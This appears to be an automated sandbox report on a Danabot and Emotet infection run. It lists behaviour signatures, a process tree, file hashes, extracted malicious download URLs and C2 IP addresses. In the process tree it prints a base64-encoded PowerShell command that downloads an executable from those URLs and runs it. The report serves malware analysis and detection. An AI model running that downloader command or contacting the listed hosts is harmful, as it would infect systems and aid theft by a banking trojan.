Analysis
-
max time kernel
226s -
max time network
230s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
20/02/2025, 00:26
General
-
Target
http://www.badmalwhere.com/download
Malware Config
Extracted
http://blockchainjoblist.com/wp-admin/014080/
https://womenempowermentpakistan.com/wp-admin/paba5q52/
https://atnimanvilla.com/wp-content/073735/
https://yeuquynhnhai.com/upload/41830/
https://deepikarai.com/js/4bzs6/
Extracted
danabot
51.178.195.151
51.222.39.81
149.255.35.125
38.68.50.179
51.77.7.204
Signatures
-
Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
-
Danabot family
-
Danabot x86 payload 1 IoCs
Detection of Danabot x86 payload, mapped in memory during the execution of its loader.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 10 IoCs
-
Downloads MZ/PE file 2 IoCs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 3 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies registry class 2 IoCs
-
NTFS ADS 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 17 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://www.badmalwhere.com/download1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffc88b146f8,0x7ffc88b14708,0x7ffc88b147182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:32⤵
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4840 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6424 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6160 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@40923⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f04⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 4643⤵
- Program crash
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6588 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6556 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6652 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,17911824786311790623,10909860507477324415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\ChilledWindows.exe"C:\Users\Admin\Downloads\ChilledWindows.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4092 -ip 40921⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x52c 0x5281⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD50d6b4373e059c5b1fc25b68e6d990827
SHA1b924e33d05263bffdff75d218043eed370108161
SHA256fafcaeb410690fcf64fd35de54150c2f9f45b96de55812309c762e0a336b4aa2
SHA5129bffd6911c9071dd70bc4366655f2370e754274f11c2e92a9ac2f760f316174a0af4e01ddb6f071816fdcad4bb00ff49915fb18fde7ee2dabb953a29e87d29e4
-
Filesize
152B
MD5a4852fc46a00b2fbd09817fcd179715d
SHA1b5233a493ea793f7e810e578fe415a96e8298a3c
SHA2566cbb88dea372a5b15d661e78a983b0c46f7ae4d72416978814a17aa65a73079f
SHA51238972cf90f5ca9286761280fcf8aa375f316eb59733466375f8ba055ce84b6c54e2297bad9a4212374c860898517e5a0c69343190fc4753aafc904557c1ea6dc
-
Filesize
3KB
MD56dc9d1f66e64acd2f36c472dd5f49bd3
SHA12c5c3107bbe83c31208c1c053245f909e2ff7523
SHA25663f6ec78a3f5e7e5c0468795d8885d5510b7e4458292ba42cf81f40708cc23fc
SHA512a4f604b98da6b39be09ee548d3068c60eb26ec3889e67618c1f8f57fb177a3962036624831b5581aa9bb23e7a3ca4d24aaca0304abca6ca8b0863c658f14c483
-
Filesize
3KB
MD51c81efef286cf3fba7c1702d84d86699
SHA129058cf7ffe18a35d0b7bc934752faab7aa9aba5
SHA2569fc9695e562c2e0696cfee1b332c17dc4566062110e8363bf57e17f3243bfb3d
SHA512ba84cf70485ff4ff02c5f1eff74467399f07a631736bec27300825a4794f98d1e022de2a6fde22f45df6d31d884eafbc70c776dcac7cf58b1ec8cf906f74ba68
-
Filesize
788B
MD50bd6e8364eb4382f9f708be25193b76d
SHA122dcddb8c1b29056298f11b41e55440031d2f8ab
SHA25638b2205e92f1744219c6675f6d143ea00904e91e94f895a7e071ac231cedb4dc
SHA5125d4d9c86fbe7e123529ab9af2bfbe624060a828318b441dce07fc0e7d3a791c6bfad0e7b4cfd1adcd78f88f3786a7c7ec07b6ce9e779ca4bda933493d7cfe867
-
Filesize
871B
MD5fbd37b6f02be2c425f43525985105fbd
SHA151a3d918182500ac7cfbf9e7a14d3eee4775fa8b
SHA256fce78c8d9b42459d7f173a1916055f9e57b19f48d908fb34cb42f6f2be5f3324
SHA512b422f3a7178a2bfe76ee68985a4108bcf07a2cf726890f46bd50941a8a0abdedaedd1c99f58389e9b1dc3a2cfb9c985017fb796ef23779b7055f6bbc2bdd81c7
-
Filesize
6KB
MD5b645af2736d2afcb07896febfd361c52
SHA1d774dcfda5fe9b04452867c71e64db8f0f8f90d6
SHA2564b5342ea2ad3d222315074fe816662b9c57b83c53ec35d92e9a2b966ce4f352c
SHA512901178e16c6d3f13c14e121649bd601fa2341289fbf932ed3581c95838552b46db44d8048f8265bf641ba6b0b24b763cbe932a5f353ed8afa02eee2702db7851
-
Filesize
6KB
MD5c5a0312a92d30c45ca5fa4219608dfe6
SHA160e1747689e15d2bb10b6aaa34481d1a99285d61
SHA256b6a9c5b912d1e553073cbf8201ae1034d36ff51da1c21c3b9b79a1e22963d0f3
SHA512c1b86039163d1cf4303fcda7e7fe1a3fe08640c0e2b2af1ae26aa045855dffd57b418658413177e1d3d8d8598c42924da5ef2064e96d532750245251aa14f58d
-
Filesize
6KB
MD5a40c09554114517551400762c21d760f
SHA10e8aecc2ceadbab8f2a284605cdb2fa177f929e6
SHA256d7d07b1a85d2e2d61a6fa1637c7e15484e1ac92dfa79796e201f98464f6d82df
SHA51231fb13c16cfb7d774e4a46bb864741506d64d19a74b503e0e0edf048afecc279f04c03383356623133589b59db42fcf59b1b2908e03883f98191f396b85deebf
-
Filesize
7KB
MD521765a609021a03c1c9836e32884a95d
SHA19e533e6bdcd815e32800c7f761d4eb32c4aa0a3b
SHA256051c4ad359203c4355885d6c4317c11ea4edaa370c79dbb6c49cc062c029e629
SHA512fb7011a4ce78b2c33098217d890089cbe02895c1d24b77df2e889bf44b6d60f4ce5130753861aa8de788c8a9ce9cc59e02b67dcbd1e36aea3f83bf7cd929dfb7
-
Filesize
7KB
MD5a46dd5b593e5cdd09485a6256b42ca98
SHA19cf0c4f59010013970534361c07e41d48cdf32f3
SHA256dfaa05935255d2cfdf20e6c47b618ef400c3425d7703455afd45c775c1ae8eba
SHA5123eeb7e992554819772b3fb6ead8aa7abab29616d75af35431a82b26887a8058b714c765074af8acf138ade55c62da69db0f54b6c367a2f3ffcf28c4ff9ce3512
-
Filesize
7KB
MD5e6674242c4315e849c41507f816a4e92
SHA180500df802ab7a507219f7df44f3f34a206abe6d
SHA2566fb9d85bfd5d5f4041e4af64d885b57112960752015cf4db92600269bda981af
SHA51207fe67998ce52c1aab9d6b4c262162241d877a66061a62bdcdf92a3088d375af83331348c92305987c92edaf866bd0f67b5db35336a0c7fc7ec383005f6bbabf
-
Filesize
1KB
MD559bf093340dfecfc9df779be5dd8162e
SHA16b0f26ef901d9f7b25064a9fa8ad673ab9091d1c
SHA25672d1c0e94a3fc0273d8681af2d74ff3ba6034d8fc83300a2bd56069d9f11af72
